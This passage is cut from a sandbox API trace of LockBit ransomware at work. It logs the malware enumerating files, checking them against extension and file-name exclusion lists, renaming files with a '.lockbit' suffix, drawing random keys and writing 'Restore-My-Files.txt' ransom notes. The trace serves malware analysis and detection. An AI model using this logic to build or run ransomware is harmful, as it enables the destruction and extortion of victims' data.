ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.277] malloc (_Size=0x40068) returned 0x3d70450 [0165.277] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3112) returned 1 [0165.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0165.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0165.278] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0165.297] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.298] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.298] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.299] free (_Block=0x1fa2ed8) [0165.299] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02450_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.299] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.299] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd70, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02451_.WMF", cAlternateFileName="")) returned 1 [0165.299] lstrcmpiW (lpString1=".", lpString2="NA02451_.WMF") returned -1 [0165.299] lstrcmpiW (lpString1="..", lpString2="NA02451_.WMF") returned -1 [0165.299] PathFindExtensionW (pszPath="NA02451_.WMF") returned=".WMF" [0165.300] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.300] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.301] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.301] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02451_.WMF") returned 1 [0165.302] lstrcmpiW (lpString1="ntldr", lpString2="NA02451_.WMF") returned 1 [0165.302] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02451_.WMF") returned 1 [0165.302] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02451_.WMF") returned -1 [0165.302] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02451_.WMF") returned -1 [0165.302] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02451_.WMF") returned 1 [0165.302] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02451_.WMF") returned -1 [0165.302] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.302] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF") returned=".WMF" [0165.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.302] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.302] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.303] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.303] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF.lockbit") returned 72 [0165.303] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02451_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.309] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.309] malloc (_Size=0x40068) returned 0x3df0008 [0165.309] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3440) returned 1 [0165.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.309] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.310] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.313] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.313] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.313] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.314] free (_Block=0x1fa2ed8) [0165.314] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02451_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.314] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.315] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02453_.WMF", cAlternateFileName="")) returned 1 [0165.315] lstrcmpiW (lpString1=".", lpString2="NA02453_.WMF") returned -1 [0165.315] lstrcmpiW (lpString1="..", lpString2="NA02453_.WMF") returned -1 [0165.315] PathFindExtensionW (pszPath="NA02453_.WMF") returned=".WMF" [0165.315] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.315] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.316] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.316] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02453_.WMF") returned 1 [0165.317] lstrcmpiW (lpString1="ntldr", lpString2="NA02453_.WMF") returned 1 [0165.317] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02453_.WMF") returned 1 [0165.317] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02453_.WMF") returned -1 [0165.317] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02453_.WMF") returned -1 [0165.317] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02453_.WMF") returned 1 [0165.317] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02453_.WMF") returned -1 [0165.317] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.317] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF") returned=".WMF" [0165.317] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.317] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.317] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.318] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.319] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.319] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.319] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.319] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF.lockbit") returned 72 [0165.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02453_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0165.320] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.320] malloc (_Size=0x40068) returned 0x1ff1e60 [0165.320] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3388) returned 1 [0165.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0165.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0165.321] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.326] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.326] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.326] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.327] free (_Block=0x1fa2ed8) [0165.328] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02453_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.328] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.328] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.328] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6a3bce50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1750, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBOOK_01.MID", cAlternateFileName="")) returned 1 [0165.328] lstrcmpiW (lpString1=".", lpString2="NBOOK_01.MID") returned -1 [0165.328] lstrcmpiW (lpString1="..", lpString2="NBOOK_01.MID") returned -1 [0165.328] PathFindExtensionW (pszPath="NBOOK_01.MID") returned=".MID" [0165.328] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.328] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.328] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.328] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.328] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.328] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.329] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.329] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.330] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.330] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.330] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.330] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.330] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.330] lstrcmpiW 